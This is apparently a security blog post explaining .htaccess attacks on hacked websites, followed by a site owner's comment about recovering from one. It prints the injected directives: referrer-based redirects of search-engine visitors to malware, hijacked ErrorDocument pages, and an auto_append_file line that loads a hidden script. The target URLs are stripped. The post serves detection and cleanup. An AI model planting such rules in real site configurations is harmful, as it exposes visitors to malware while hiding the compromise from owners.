The Latest in IT Security

Understanding .htaccess attacks – Part 1


Attackers have been using the .htaccess file for a while. They use this file to hide malware, to redirect search engines to their own sites (think blackhat SEO), and for many other purposes (hide backdoors, inject content, to modify the php.ini values, etc).

Why do they use the .htaccess file? For multiple reasons. First, the .htaccess is a hidden file (starting with a “.”), so some site owners might not find them in their FTP clients. Secondly, it is a powerful file that allows you to make multiple changes to the web server and PHP behavior. This makes a .htaccess the attack hard to find and to clean up.

1- Redirecting users coming from search engines to malware

This is the most simple type of .htaccess attack, and the one we see more often. This is what gets added to the .htaccess file of a hacked site:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ [R=301,L]

As you can see, it will check the referrer from anyone visiting the site and if the user came from a Google search (or yahoo or bing or any search engine), it will redirect the user to a page with malware (in this example Note that if you type the site directly in the address bar of your browser, nothing will happen. Why? It makes harder for the owner of the site to detect the attack, since they will probably type the site name, and not search for it on Google.

Below is another example of the same attack, but this time redirecting to (one of those Hilary kneber domains). Note that this time, they’v added hundreds of white spaces before the “RewriteCond” to make it harder to see in a text editor (We removed below to make easier to read in the post).

# BEGIN WordPress
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC]
RewriteRule .* [R,L]


2 – Redirecting the error pages to malware

This is the second most common type of .htaccess malware. Instead of redirecting all traffic, the attackers are only modifying the error pages to their own domains (even harder to detect). This is what shows up in the .htaccess:

RewriteEngine On
ErrorDocument 400
ErrorDocument 401
ErrorDocument 403
ErrorDocument 404
ErrorDocument 500

Other examples:

ErrorDocument 400
ErrorDocument 403
ErrorDocument 404
ErrorDocument 405
ErrorDocument 404
ErrorDocument 405
ErrorDocument 406
ErrorDocument 400
ErrorDocument 403
ErrorDocument 404
ErrorDocument 405


3 – Appending malware to a web site

This type of attack is getting more common lately. Instead of doing the redirection in the .htaccess file, they modify the PHP value “auto_append_file” to load malware from a hidden location. For example:

php_value auto_append_file “/tmp/13063671977873.php”

So the content of /tmp/13063671977873.php gets appended to every PHP file. This is what the PHP file looks like:

<script src=””></script>

A common javascript malware. They sometimes even append fake images to make it even harder to detect.

In the next part of this article we will talk about additional .htaccess attacks and give you some tips to detect and analyze them.

  1. greenman-23 November 17, 2011

    My site got compromised by this hack….. I noticed it a few days ago and installed BPS plugin to my wordpress site; (2010 theme up=to-date) …. although some of my plugins are out of date…..

    unfortunately it didn’t cure the problem (perhaps installing security after compromise and without first removing the attack just ‘locks it in?’

    As I’ve been away and haven’t updated the site recently I resorted to a backup and then reactivated the BPS plugin… so far so good….

    will advise if that changes



Leave a reply



Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...



Latest Comments